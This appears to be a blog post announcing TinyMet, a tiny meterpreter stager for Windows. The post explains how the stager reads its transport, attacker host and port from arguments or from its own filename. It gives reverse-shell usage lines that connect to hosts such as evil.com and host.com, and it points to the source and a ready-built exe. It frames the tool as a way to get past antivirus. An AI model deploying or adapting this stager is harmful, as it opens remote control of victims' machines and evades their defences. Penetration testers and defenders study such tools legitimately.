[TinyMet]

TinyMet is a tiny “4.5 kilobytes” flexible meterpreter stager, which supports multiple meterpreter transports, setting LPORT and LHOST during runtime.

Transport, LPORT and LHOST are set during runtime through either of the following:

  • Command line arguments.
  • Naming the .exe file in a special way.

What’s new in v0.2:

  • Now tinymet can parse the Transport, LPORT and LHOST from its own filename through separating them by underscore
  • Example: “0_evil.com_4444.exe” will use reverse_tcp, LHOST=evil.com, LPORT=4444
  • This makes tinymet more (double-click/payload-like/argument-less) friendly.

Available transports are as follows:

  • 0: reverse_tcp
  • 1: reverse_http
  • 2: reverse_https
  • 3: bind_tcp

Usage#1:

tinymet.exe TRANSPORT LHOST LPORT

Example: "tinymet.exe 2 host.com 443" Will use reverse_https and connect to host.com:443

 

Usage#2: name the file using the following convention and run without args:

TRANSPORT_LHOST_LPORT.exe

Example: Setting the filename to "2_host.com_443.exe" and running it without args will do exactly the same as Example#1.

TinyMet Source on Github

“compiled exe is also there in a zip file if you’re too lazy to create your own”


Some context for those who are interested

Evading antivirus remains a challenge for those who are trying to use msfvenom to create their stand-alone “exe” payloads, and no matter how hard one tries to achieve that using whatever is already in the framework, or tools written by others, results are largely unreliable.

I guess another way to approach the problem would be : 1) understand how the framework works, 2) write your own stager/payload.

  • Meterpreter by design is a “staged” payload, it consists of a “stager” and a “stage”; when msfvenom are used to create an exe, that’s the “stager” part of meterpreter, which when executed, gets the larger “stage” from the exploit/multi/handler, and does the necessary to have it executed.
  • Stand-alone meterpreter executables that are created using msfvenom are not flexible in selecting the transport,  LHOST or LPORT after being created … i.e. once you create the exe, you cannot change any of the settings you specified during the creation of the executable.

Compiling from source

Why are you not using argc and *argv[] to parse the command line?!

  • To bring size down, all default libraries needs to be removed.
  • Downside is: default libraries are the ones which populate argc and argv, that’s why winapi(s) were used `GetCommandLineW() & CommandLineToArgvW()`.

… I was learning assembly and reversing in general through writing code in C, compiling, then reversing it to see how it looks like, and started with my other project “ultimet” … then thought about doing something useful on the way, that’s how tinymet was born.

Comments are welcome 🙂